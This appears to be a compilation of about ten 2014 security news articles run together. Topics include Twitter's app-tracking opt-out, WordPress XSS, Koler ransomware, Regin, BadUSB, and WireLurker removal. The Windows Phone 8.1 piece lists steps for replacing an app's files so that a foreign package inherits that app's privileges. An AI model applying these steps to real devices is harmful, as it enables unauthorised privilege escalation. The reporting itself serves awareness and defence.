Twitter to start snooping at which apps you have installed - here's how to opt out

Twitter is set to start peeking on users' iPhones, iPads and Androids in order to see which apps they
have downloaded.

The company will start collecting the list of apps installed on those smartphones and tablets so that it can, in its own words, "deliver tailored content that you might be interested in."

A support article says the additional data collection will allow Twitter to make better recommendations on who to follow, as well as insert content it thinks you will find interesting into your feed.

The new feature, which Twitter has named "app graph," could tie in with the company's recently announced Instant Timeline feature which takes new users' areas of interest and the people their contacts follow, and serves up a feed created for them in order to better personalise Twitter from day one.

By collecting data about other installed apps, the feature would be better positioned to create a more relevant starting timeline.

Of course, the main benefit to Twitter will be the ability to use the collected information to surface more targeted adverts. Or, as Twitter puts it, show you more promoted content it "think[s] you'll find especially interesting."

Twitter says it will only record the list of apps you have installed, not how they are used.

So, for example, Twitter will be able to see that you have Spotify on your phone, but not that you're listening to the same 80s classic over and over and over again.

While entry into the new tracking system is automatic and opt-in by default, Twitter has promised to alert users when the new feature is turned on.

We will notify you about this feature being turned on for your account by 

showing a prompt letting you know that to help tailor your experience, 

Twitter uses the apps on your device. 

Until you see this prompt, this setting is turned off and 

we are not collecting a list of your apps.

If you don't want your apps to be snapped up by Twitter's data gobblers, here's how to turn it off:

Twitter for Android

1. Tap the overflow icon (looks like 3 vertical dots)
2. Choose Settings.
3. Select your account
4. Under Other, turn off Tailor Twitter based on my apps.

Twitter for iOS

1. Tap the Me tab, and then the gear icon
2. Choose Settings
3. Select your account
4. Under Privacy, turn off Tailor Twitter based on my apps.
5. Once you opt out, Twitter says it will remove your app graph data from Twitter and stop future collection.

If you don't yet see the option then Twitter won't have started tracking you yet.

If you want to stop the collection before it's started, Twitter says you can turn on Limit Ad Tracking on your iOS device by going to Settings and Privacy.

If you're an Android user, go to Settings, tap the Google account, choose Ads and then turn on Opt out of interest-based ads.

Layers and Protocols of Internet of Everything Devices

We see the ‘cool’ when we wear or operate our smart TVs and watches and all other smart devices we own. But are we aware of how the data is processed in these devices? And where does the data we get or the data that these devices transmit end up?

Most, if not all, smart devices are connected to the Internet – where the data we send and receive over our smart devices are stored. Before ending up on the Internet, the data passes through several layers:

1. Link layer – where the smart devices sends and shares the data. In this layer, the data is shared among devices via Wi-Fi, Ethernet, RFID, and Bluetooth protocols, among others.
2. Router layer – can also be referred to as the Smart Hub layer. It is the device that connects all of your smart devices to the Internet.
3. Session layer – when you use apps in your smart devices (think FitBit as an example), the data sent and received through these apps are managed in this layer. Both HTTP and HTTPS are the more known protocols used in this layer.
4. Internet layer – can also be called as the Cloud layer. This is where the data ends up. If you use apps that have equivalent Web-based login pages (take fitness monitoring apps such as Runtastic, for example), you’ll see the 101 steps you recorded is ‘pushed’ to your Web profile almost immediately.

Now there is nothing wrong with the way smart devices and the Internet link together. It’s perfectly fine save for one thing: there are risks. The possibility of the Internet layer (where the data is stored) being attacked is highly likely. Password-based attacks – guessing passwords, brute force attacks – can be used to access the Internet layer and steal data. Changing the data that passes through the Session layer by way of man-in-the-middle (MITM) attacks is also possible. Hacking the Link layer, while difficult and low-yield, is also likely.

Be on the safe and smart side of smart devices. There is an infographic Layers and Protocols: Possible Attacks on the Internet of Everything that will walk you through the risks and suggests protection measures you need to know and implement.

Click to enlarge:

Four-year-old comment security bug affects 86 percent of WordPress sites

A Finnish IT company has uncovered a bug in WordPress 3 sites that could be used to launch a wide variety of malicious script-based attacks on site visitors’ browsers. Based on current WordPress usage statistics, the vulnerability could affect up to 86 percent of existing WordPress-powered sites.

The vulnerability, discovered by Jouko Pynnonen of Klikki Oy, allows an attacker to craft a comment on a blog post that includes malicious JavaScript code. On sites that allow comments without authentication—the default setting for WordPress—this could allow anyone to post malicious scripts within comments that could target site visitors or administrators. A proof of concept attack developed by Klikky Oy was able to hijack a WordPress site administrator’s session and create a new WordPress administrative account with a known password, change the current administrative password, and launch malicious PHP code on the server. That means an attacker could essentially lock the existing site administrator out and hijack the WordPress installation for malicious purposes.

“For instance, our [proof of concept] exploits first clean up traces of the injected script from the database,” the Klikki Oy team wrote in a blog post on the vulnerability, “then perform other administrative tasks such as changing the current user's password, adding a new administrator account, or using the plugin editor to write attacker-supplied PHP code on the server (this impact applies to any WordPress XSS if triggered by an administrator). These operations happen in the background without the user seeing anything out of the ordinary. If the attacker writes new PHP code on the server via the plugin editor, another AJAX request can be used to execute it instantaneously, whereby the attacker gains operating system level access on the server.”

The current version of WordPress (version 4.0), which was released in September, is not vulnerable to the attack. However, WordPress issued a security update to version 4.0 last week to address unrelated cross-site scripting issues.

Android ransomware 'Koler' turns into a worm, spreads via SMS

A malicious Android app that takes over the screen of devices and extorts money from users with fake notifications from law enforcement agencies was recently updated with a component that allows it to spread via text message spam.

Known as Koler, the ransomware Trojan has been on malware researchers' radar since May when it started being distributed through porn websites under the guise of legitimate apps. A new variant of the threat found recently by researchers from security firm AdaptiveMobile spreads through SMS messages that attempt to trick users into opening a shortened bit.ly URL.

Once installed on a device, Koler opens a persistent window that covers the entire screen and displays a fake message from local law enforcement agencies accusing users of viewing and storing child pornography. Victims are asked to pay a "fine" using MoneyPak prepaid cards in order to regain control of their phones.

The Koler ransomware is capable of displaying localized ransomware messages to users from at least 30 countries, including the U.S., where the impersonated law enforcement agency is the FBI.

The new version found by AdaptiveMobile sends a text message to all contacts in the victim's address book. The message reads: "someone made a profile named -[the contact's name]- and he uploaded some of your photos! is that you?" followed by a bit.ly URL or a similiar URL shortened link:

The URL points to an Android application package file called IMG_7821.apk that's hosted on a Dropbox account. When installed, this application uses the name PhotoViewer, but is actually the ransomware program.

Due to the Worm.Koler's SMS distribution mechanism, a rapid spread of infected devices since the 19th of October is observed, which is believed to be the original outbreak date.

During this short period, several hundred phones that exhibit signs of infection have been detected across multiple US carriers. In addition to this, other mobile operators worldwide -- predominantly in the Middle East, have been affected by this malware.

The best protection against ransomware threats like Koler is to have the "unknown sources" option turned off in the Android security settings menu. When this setting is disabled -- and it typically is by default -- users won't be able to install applications that are not obtained from the official Google Play store. Some users do turn this option on though, because there are legitimate applications that are not hosted on Google Play for various reasons.

Koler does not encrypt users’s files, for this reason it is easy for users to eliminate it from infected devices. Below the instructions to remove the malware:

• Reboot the mobile device in the “Safe Mode“
• Remove the malicious ‘PhotoViewer‘ app using standard Android app uninstallation tool

Instructions on how to reboot the device in safe mode should be available in the phone's manual, but it generally involves pressing and holding the power button until the power menu appears, then tapping and holding Power Off until the option to reboot in safe mode appears.

As of 24 Nov, this worm has reached the shores of Singapore, as reported in a popular local forum.

Symantec Uncovers Sophisticated, Stealthy Computer Spying Tool

Computer security researchers at Symantec say they have discovered a sophisticated piece of malware circulating the world that appears to be used for spying at Internet service and telecommunications companies, and was likely created by a government agency. And while its origin is unclear, a short list of capable countries would include the U.S., Israel and China.

The research, published today, comes from the same team at Symantec that four years ago helped discover and ferret out the capabilities of Stuxnet, the world’s first digital weapon. It is believed to have been created by the combined efforts of the U.S. and Israel and used to sabotage the Iranian nuclear research program.

The team has dubbed this newly found Trojan “Regin” according to a Symantec blog post, and they are describing it as a “complex piece of malware whose structure displays a degree of technical competence rarely seen.” They say the tool has an “extensive range of capabilities” that provides the people controlling it with “a powerful framework for mass surveillance.”

The researchers said Regin has been used in what appears to be an ongoing spying operation that started in 2008, stopped suddenly in 2011, and then resumed in 2013.

The campaign was carried out against government organizations, businesses, researchers and private individuals. About 100 Regin infections have been detected, the researchers said, with most — a combined 52 percent — in Russia and Saudi Arabia. The remainder have occurred in Mexico, Ireland, India, Afghanistan, Iran, Belgium, Austria and Pakistan. No infections have yet been detected in the U.S. or China.

Symantec was first made aware of Regin after customers discovered parts of it and sent the code for analysis. “We realized there was more to what was sent us than was readily apparent and went back to investigate further,” said Liam O’Murchu, one of the researchers. Symantec security software can now detect it, he said.

The quality of Regin’s design and the investment required to create it is such that it was almost certainly made by a nation-state, said O’Murchu. But asked to speculate which nation-state, he demurred. “The best clues we have are where the infections have occurred and where they have not,” he said in an interview with Re/code. “We know it was a government that is technically advanced. … This has been a huge spying campaign dating back at least to 2008 and maybe even as early as 2006.”

It doesn’t take much of a leap to wonder out loud if the U.S. National Security Agency or the Central Intelligence Agency, perhaps working with Israel, might be the source, especially given the list of countries targeted. However, there are other possible sources, including China.

There is still a lot about Regin that’s not known. (And for more technical detail on what is known, there’s a 21-page white paper here.) There are pieces of it, O’Murchu said, that haven’t yet been found and examined. But here’s what understood so far:

Regin attacks systems running Microsoft Windows. It attacks in stages and requires five pieces. Only the first stage is detectable– it opens the door for the subsequent stages, each of which decrypts and executes the following stage. In this way it’s similar to Stuxnet and its sibling Trojan, Duqu which was designed to gather intelligence on a target by stealing massive amounts of data.

Nearly half of all Regin infections occurred at Internet service providers, the targets being the customers of those companies. Other companies attacked included telecom providers, hospitality companies, energy companies, airlines and research organizations.

How the malware spreads is also a mystery. In one case — but only one — the infection was carried out by way of Yahoo Instant Messenger. In other cases, Symantec believes victims were tricked into visiting spoofed versions of well-known websites. “Other than that one example, we have no firm information on how it has been distributed,” O’Murchu said.

Once a computer has been compromised, Regin’s controllers can load it up with whatever payload is needed to carry out the spying operation. Said Symantec: “Some custom payloads are very advanced and exhibit a high degree of expertise in specialist sectors,” say something that’s specifically geared toward spying on an airline or an energy company. This is “further evidence of the level of resources available to Regin’s authors,” the company said.

There are dozens of these payloads. One seen in several cases is a remote access tool, or RAT, which gives an attacker the ability to take control of a computer remotely — copy files from the hard drive, turn on the Web cam, turn on the microphone. RATs are also good for capturing keystrokes, a good way to steal passwords. Some of the more advanced payloads seen on machines compromised by Regin include software to monitor network traffic and a tool to manage mobile phone base stations.

Exceptional effort was made by its creators to prevent Regin and its communications to its handlers from being detected. “Even when its presence is detected, it is very difficult to ascertain what it is doing,” said Symantec.

Several pieces of Regin are still circulating and are as yet undiscovered, O’Murchu said. He hopes that with the publication of Symantec’s findings, more information from other researchers will come to light.

If You Didn’t Change The Default Password On Your Security Camera, Someone’s Probably Watching It Stream

Remote access has been a boon to many industries. Home security cameras, for example: not only can you keep an eye on your property in case anything bad happens, but you can do it in real-time, instead of reviewing footage after the fact. But cameras protecting the security of your home may in fact need a serious security helper of your own. And running tens of thousands of searchable livestreams from unwitting camera owners who didn’t change default the access passwords on their devices is certainly one (unethical, intrusive) way to make the point.

One site does exactly that, as Vice reported recently. The site runs live streams of feeds from tens of thousands of IP cameras around the world.

Users buy the devices — think nanny cams, baby monitors, and home security — to keep an eye on their families, valuables, and property. But with poor security practices, anyone and everyone else can keep an eye on your goods, too.

Cameras designed to be accessed remotely, as these are, have passwords. And they ship with default passwords, that users are supposed to change during the set-up processes. Only, many users don’t. (Even when they do, admittedly, people are often objectively terrible at passwords.) That makes it easy for someone with an idea for a website to come along and write a script that looks for cameras on the internet, then tries the default password on them and adds the feed to a public collection if that password works.

Despite running ads and generating revenue, security is the real point the site is making, its owner told Vice. “Most people still do not know about the problem,” they wrote in an e-mail, and so nobody has yet asked to have their camera removed from the collection. “Only [the website] can prove the scale of the problem,” the administrator added. “This problem was in darkness for many years.”
Vice then goes on to look at how ethical hackers — the so-called “white hat” set — expose software vulnerabilities and then share their information with the companies that made the vulnerable products. It’s a common pastime for network security experts and for security companies. (When done by the latter, it’s not entirely altruistic: if you can point out a security hole, you can point out the need for someone to buy your services to fix it.)

The person or group behind this particular website, Vice concludes, isn’t exactly one of the good guys; they’re doing something both illegal and unethical. But this particular camera-sharing website, though troubling, isn’t really the root problem. It’s just one symptom of a massive, much larger, much deeper issue.

As everything gets “smart,” mobile, remote-accessible, and connected, security becomes an ever-deeper challenge. Sophisticated hackers will probably always be able break their way into certain lucrative systems, just as criminals will always try to rob physical banks. But millions of cracks, hacks, and break-ins aren’t even the purview of sophisticated hacking operations: they’re just the result of plain bad security that end-users — we home consumers — didn’t even know needed fixing. It’s not about how to protect your bank vault from Bonnie and Clyde; it’s about knowing the cash should go in a vault in the first place, and not simply be left in piles on the lawn.

Commandeered cameras are incredibly intrusive, but as far as poor default security goes, they’re only the tip of the iceberg.

Every wifi router ships with a default password, and it’s super easy to look those up by make and model. Securing your router, on the other hand, takes more work.

Your remotely-accessible multifunction printer might use a weak default password or in fact not have a password at all, meaning anyone with know-how could get in. Like a wandering security expert who hacks it to run video games… or someone less ethical, installing something worse as a gateway to the whole network.

A common default password can get you into a cash-filled ATM, where you could presumably then commit actual bank robbery.

At least, though, we all have a vague association with “network” and “security” when it comes to our
routers, even if we’re bad at implementing it, and we know that banks need strong network security to protect their customers and their transactions. But security applies to everything that uses an internet connection.

From heating to cooling, homes are getting ever more connected. When your whole house goes smart, Bradbury-style, that means your whole house is vulnerable. Last year, one Forbes contributor explained how she was able to access everything from televisions to light switches to hot tubs in complete strangers’ homes.

Home appliances — from TVs to refrigerators — have already been unwitting participants in spam-sending botnets. Spam e-mail is annoying but comparatively harmless. Future intrusions, though, might not be.

Any company making connected devices that can receive, transmit, or share data needs to be stepping up their security game. Anything and everything should clearly require passwords and should require on first use that owners change those passwords to something reasonably secure, for a start.

But until then, the burden remains on individuals. Any time you buy or install a device that in any way connects to the internet? Look up how to keep it secure. And use a good password when you do.

WhatsApp Messenger Adds End-to-End Encryption by Default

Good news for all Privacy Lovers! Finally the wildly popular messaging app WhatsApp has made end-to-end encryption a default feature, stepping a way forward for the online privacy of its users around the world.

WhatsApp, most popular messaging app with 600 Million users as of October 2014, has partnered with Open Whisper Systems to boost its privacy and security by implementing strong end-to-end encryption on all text messages.

The strong end-to-end encryption here means that even Mark Zuckerberg himself can't pry into your conversations, even if asked by law enforcement officials. The app maker describe this move as the "largest deployment of end-to-end encryption ever."

The Open Whisper System is a non-profit software organisation started by security researcher Moxie Marlinspike, who is behind the development of TextSecure app used for encryption. Over the past three years, his team has been in the process of developing a 'modern, open source, strong encryption protocol' for messaging service, which is now being incorporated into Whatsapp.

A simplified picture of how OTR protocol works, courtesy of WhisperSystems

There are some limits to WhatsApp's end-to-end encryption, as so far, it only works on Android platform (with iOS coming soon) and covers only one-to-one messages, not group messages. Also the app is now open to potential man-in-the-middle (MitM) attacks because there's no way to check or verify the identity of the person you are messaging.

WhatsApp was bought by Facebook for $19 billion in February. The popular app has been criticized over the years for a series of security and privacy issues. But after the announcement of this rollout, it has been praised over the internet by security folks.

Other encryption messaging apps do exist currently, including Cryptochat, Silent Text and Telegram, but according to the Verge, WhatsApp will be the largest to implement this type of end-to-end encryption ever.

Open Whisper Systems is a company built from open source contributors and a dedicated team to advance "state of the the art" secure communication, and is best known as the developer of the Signal, Redphone, and TextSecure apps.

The Hacker’s New Best Friend Could be Your USB Port

It’s tiny and portable, yet perfect for storing large items. I’m talking about the good ol’ Universal Serial Bus (a.k.a USB) drive, the giveaway of choice at tradeshows across the world, and perfect for the easy storage and transfer of photos, documents, music and more. But you might want to think twice before plugging a free USB into your machine. The reason: USBs can now contract an undetectable - and unfixable - virus that can be spread quite easily.

News of this potent malicious software (often referred to as malware) has circled around the information security industry since researchers Karsten Noh and Jakob Lell described their new attack to a packed room at this year’s Black Hat security conference in early August.

The malware, dubbed BadUSB, can take over a computer, as well as redirect Internet-bound traffic to different site. But BadUSB’s danger doesn’t lie with its ability to execute code—this type of malware, called auto-run (because it runs automatically when the USB drive is inserted into your device), has been around for some time now. The danger lies with its ability to never be detected. BadUSB exploits how the USB standard was built and coded, and mixes malware with the device’s firmware—the code that tells the USB stick how to work. This intermingling of code makes the malware indistinguishable from normal, safe firmware.

Because of the danger this particular form of malware posed to the public at large, the pair refrained from releasing the code to attendees. That reasoning, however, didn’t sit well with another pair of researchers, who did publish the infectious malware after reverse engineering it. The malware that freaked out two security researchers enough to make them refrain from publishing their work is now out in the open.

USBs, long considered secure (perhaps incorrectly), are now major liabilities to consumers everywhere. So the question now is, should you be worried?

The answer is yes and no.

The good thing about this malware variant is that it’s isolated to just USB devices. But that’s also its danger: USB devices are so ubiquitous that consumers typically don’t pay them any attention—the best sort of attack vector hackers could hope for. Hackers could also hide this malware within a larger package and could, theoretically, infect a computer that would subsequently infect any and all USB devices that connect with that machine—thereby spreading the malware even further. All in all it’s pretty bad news.

So why did these researchers knowingly, and publicly, publish such dangerous malware? Because they want to see this security issue fixed, and the only way they’re convinced it’ll be fixed is by lighting a fire under USB manufacturers.

They’re not entirely wrong, either. Manufacturers, largely for business reasons, have been notoriously slow in fixing security issues (called patching), and USB drives are no different. By publicly making this code available, the pair of researchers will deny USB manufacturers the ability to claim that they weren’t aware of security vulnerabilities on USB. That knowledge, it’s theorized, will drive better security further down the road.

Publishing this code was well intentioned, and, truthfully, is a fairly standard practice in the information security industry. But this particular malware is going to cause a lot of headaches for quite a few years (likely a decade). So what can you do to protect yourself while this newfound attack vector is out in the wild? Well there are a few options available:

• Use caution with free USB drives.
  A lot of companies like to go to major conferences and events and hand out free USB drives. This is bad security practice. Free USBs have always carried the risk of being preloaded with malware, and now the risk has doubled. You don’t have to turn down free USBs drives, but you do have to be conscious of the risk you’re running when you don’t know where that USB has been. If you’re uncertain if a USB is safe, run a scan.
  
• Lock down your computers.
  USBs have long been a reliable method of compromising computers. All it takes is an unknowing person to plug a USB drive into a port, and the damage is done. Never leave your computer sitting out in a public place where someone could access your USB port.
  
• Use comprehensive security.
  Between USB devices, computers and mobile phones - all the technology we own is a security risk. So how can you minimize the likelihood of getting infected by malware? By using a comprehensive security service, which provides a comprehensive shield against malware, phishing attacks and a variety of other nasties aimed at compromising your digital life. Such software also automatically scans USBs when they’re connected to your computer, for known malware. This is a step you cannot afford to skip in the protection of your valuable information.

Windows Phone 8.1 Hacked

Do you wanna hack Nokia Lumia phone running the latest mobile operating system Windows 8.1 ? Hackers have made it very easy for you all!

Just few weeks after Microsoft announced a 19 year-old critical security hole existed in almost every version of its Windows operating system, XDA-developers have discovered a new vulnerability in Microsoft’s youngest OS Windows 8.1 that could easily be exploited by hackers to hack a Nokia Lumia phone.

XDA Developers hacker who go by the name DJAmol has found a wide open hole in OS Windows Phone 8.1 which makes the operating system very easy to hack. The vulnerability allows attackers to run their application with other user's privileges and edit the registry.

DJAmol realized that simply by replacing the contents of a trusted OEM app that has been transferred over to the SD card, the app will inherit the privileges of the original app. Once done, an attacker could then delete the existing directory and create a new directory with the same name as the original App.

As a result, the third party registry editor app will gain full access to the Info and Settings in the app itself. This how the hack can be implement in a few simple steps prescribed by XDA-developers in a blog post.

• Develop your own application package and deploy it on the target device.
• Install an any application such as “Glance Background Beta” from the Window Phone app Store.
• Delete all folders under the targeted directory of the installed app, in this case, Glance background.
• Now copy the contents of your own deployed package and paste it on the targeted directory. This implies replacing the “Program Files” of the installed app with your package files.
• Finally launch the App which will run in OEM (Glance Background beta) directory using the privileges of the targeted App.

The hack is very simple and easy to implement because all it need an application from the Window app store. But thankfully, the hack has not yet escalated to a full interop unlock, as the applications which are allowed to be moved to the SD card have limited access.

XDA developers forum reported the vulnerability to the Microsoft and also warned them that the vulnerability could give higher privileges to the attackers if tried using a First Party Application, rather a third party app. By the time, we can just wait for a response from Microsoft’s part to prevent it from getting more serious.

Suspected WireLurker malware creators arrested in China

Beijing police have arrested three people suspected of developing the “WireLurker” malware that may have infected as many as hundreds of thousands of Apple users.

Local authorities arrested the three suspects on a tip from Chinese security company Qihoo 360 Technology, the Beijing police’s Internet security team said Friday.

The three suspects, surnamed Chen, Li and Wang, were detained Thursday and charged with creating and spreading the malware, the police said in a post on its official Sina Weibo account. The police did not publish the full names of the suspects. It's ironic that China, believed to be one of the largest state sponsors of organized cyberattacks against the Western world, moved so quickly to arrest the creators of WireLurker

The malware appeared to victimize Chinese users only, and didn't have a widespread presence outside of the country. The suspects had conspired to create WireLurker as a way to gain illegal profits, and used a Chinese third-party application store called Maiyadi to spread the malware, the police added. The Maiyadi site has also been shut down.

WireLurker made headlines last week, after researchers at Palo Alto Networks discovered the malware and found that it could collect call logs, phone book contacts, and other personal information from Apple mobile devices.

Qihoo 360 Technology traced the malware back to Maiyadi, a Chinese site devoted to Apple news that also offers downloads of iOS apps and Mac software.

The malware spreads when users download an infected Mac application to their desktops or laptops. It then will go on and try to infect iOS devices once they’ve connected to the Mac via a USB cable.

About 467 Mac desktop applications infected with the malware were discovered at Maiyadi. WireLurker had yet to progress beyond collecting users’ data, Palo Alto Networks said last week.

Apple was quick to act, and said it had blocked the infected apps from launching on users’ systems. Apple did not specify how it stopped the apps from launching.

#ClickSmart Tip!

Think your computer is immune to viruses? Think again! #ClickSmart this season to keep all your holiday cheer. 

How To Find And Remove WireLurker Malware From iPhone, iPad

The WireLurker Malware is the malware which is badly affecting iPhone and iPad. This malware has hit many iOS and OS X devices in China already.Therefore, most of the users across the globe are little worried about the security of their device.

Known to exist as a threat in China for now, but if you think you’re infected by WireLurker, then here’s how you can remove it before it does any damage.

If you’re jailbroken and believe that you’re affected by WireLurker, then follow the steps which are outlined below. But be warned, the steps might be a little complicated for some users, and if you feel that you don’t want to go through the tedious process, then simply do a clean restore of your iPhone, iPad or iPod touch using iTunes on the latest currently available public iOS release.

For Jailbroken Users
Step 1: Make sure you have iFile installed from Cydia, or the capability to SSH into your iOS device to access system directories.
Step 2: Navigate to /Library > /MobileSubstrate > /DynamicLibraries.
Step 3: Here, look for a file named sfbase.dylib, and if found, you know your device is infected.

However, if no such file exists, breathe a sigh of relief.

Normally one would perceive deleting this file as a removal of the threat that WireLurker is, but it is recommended that you do a complete restore of your iOS device from iTunes.

For Non-Jailbroken Users
Although there’s no way you can be infected by WireLurker at this point, considering Apple has placed in appropriate security measures, but, there’s a possibility that you conceived the malware a while back before the Cupertino giant took action. And if you believe that you’re infected, and don’t happen to be jailbroken, then read on.

Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile listed here, and if you find one delete it.

Step 3: Check all installed apps for strange behavior, and delete all strange or suspicious ones that you find installed.

Again, it is highly recommended that you do a complete restore of your iOS device from iTunes till a more effective and sure fire solution comes up.

If you found this guide helpful, then do share it with your friends too, in order to make them safe and secure too.

The iPhone WireLurker malware - what you need to know

There’s a scary new piece of malware that collects call logs, phonebook contacts and other sensitive information from Apple iPhones and iPads. Should you be worried?

The malware was first discovered by researchers at Palo Alto Networks who dubbed it WireLurker and said it exhibited behavior that had never been seen before in malicious software targeting Apple’s platforms.

It works by infecting software downloaded from the Web into a desktop or laptop computer. Once installed, the malware waits for an iPhone or iPad to be connected via USB, then it scans the mobile device to see what software it contains. If a target app is installed, it copies the app from the mobile device to the desktop or laptop PC, infects the app and then copies it back.

Once infected, the malware appears to collect data from the user but, to date, no other malicious activity has been discovered, said Palo Alto Networks.

For hundreds of millions of Apple iOS users, malware is a scary prospect. The platform has seen so few attacks that many users don’t run antivirus software.

If you’re one of them, you probably don’t have much to worry about from WireLurker.

The primary route of initial infection has been through several hundreds apps offered through a third-party Chinese software site called Maiyadi, so if you’ve kept away from that you’re almost certainly safe.

Secondly, the malware primarily targets iPhones that have been “jailbroken”—that is had some of their security removed so certain apps can be run on them. There is a version that targets conventional iPhones and carries an Apple digital security certificate, but researchers say even that version requires that users approve it before it runs.

And finally, it targets popular Chinese apps like Taobao, Alipay or Meitu, so if you’re not running those, you have another layer of protection.

Palo Alto Networks estimates several hundred thousand iPhone and iPad users have nonetheless been infected.

For the rest, Apple has blocked affected apps so that should halt infection this time.

The limited nature of the security problem might turn out to be a blessing in disguise. Engineers at computer security companies and Apple will be able to analyze the way WireLurker works and prevent similar malware from spreading the same way in the future.

Chinese iOS devices fall prey to invasive WireLurker malware

Researchers at Palo Alto Networks said they’ve discovered an impressive malware attack against Apple devices, which for now appears to be limited to users of a Chinese application store.

The campaign revolves around infecting Mac OS X applications with “WireLurker,” which collects call logs, phone book contacts and other sensitive information on Apple mobile devices.

Some 467 Mac OS X applications offered on a Chinese third-party application store called Maiyadi were found to have been seeded with WireLurker, including “The Sims 3,” “International Snooker 2012” and “Pro Evolution Soccer 2014,” according to Palo Alto’s research paper.

Over the last six months, those applications and others have been downloaded 356,104 times ”and may have impacted hundreds of thousands of users,” the paper said.

Apple advises that users stick to downloading applications from its App Store, which it closely vets, and stay away from third-party stores for security reasons.

It would appear some people turn to the Maiyadi store because it offers applications for free, said Ryan Olson, intelligence director for Palo Alto Network’s Unit 42, the company’s threat intelligence branch.

Palo Alto analyzed three versions of WireLurker, each of which were improvements on the previous one, Olson said in a phone interview Wednesday. But it doesn’t appear the WireLurker attack progressed beyond collecting data from mobile devices.

“We think we sort of caught someone developing the attack, and they haven’t gotten to the point of launching the full attack,” Olson said. “From our perspective, it still looks like an information gathering operation.”

The WireLurker attack is notable for how it leverages desktop Mac applications as part of the attack on iOS. If someone downloaded a Mac OS X desktop application from Maiyadi, WireLurker came along with it.

WireLurker then waits for when an iOS device is connected by a USB cable. A second version of WireLurker checks if the Apple device was “jailbroken,” the term for removing restrictions that Apple uses to prevent users from running applications it has not approved.

Then it would look to see if applications such as Taobao, Alipay or Meitu, a photo editing application, were installed, Olson said. If so, it would copy the application to the desktop Mac, infect it with WireLurker and copy it back to the device.

The third iteration of WireLurker targets iOS devices that are not jailbroken as well. In that version, WireLurker used a digital certificate that Apple issues to enterprise developers so they can run their own applications in-house that do not appear on the App Store.

Using the digital certificate means iOS would allow a third-party application to be installed, although it would display a warning to users, Olson said. If a user approves the installation, WireLurker could be installed along with a legitimate application.

Olson said Palo Alto Networks has been in contact with Apple in the last few days, which is now aware of WireLurker.

“There’s no vulnerability here for them to patch, but they certainly want to be aware of malware and how it works,” Olson said.

Apple could first revoke the enterprise digital certificate that WireLurker’s creators are using, Olson said. The company could also issue an update to detect WireLurker in XProtect, Apple’s antivirus engine, he said.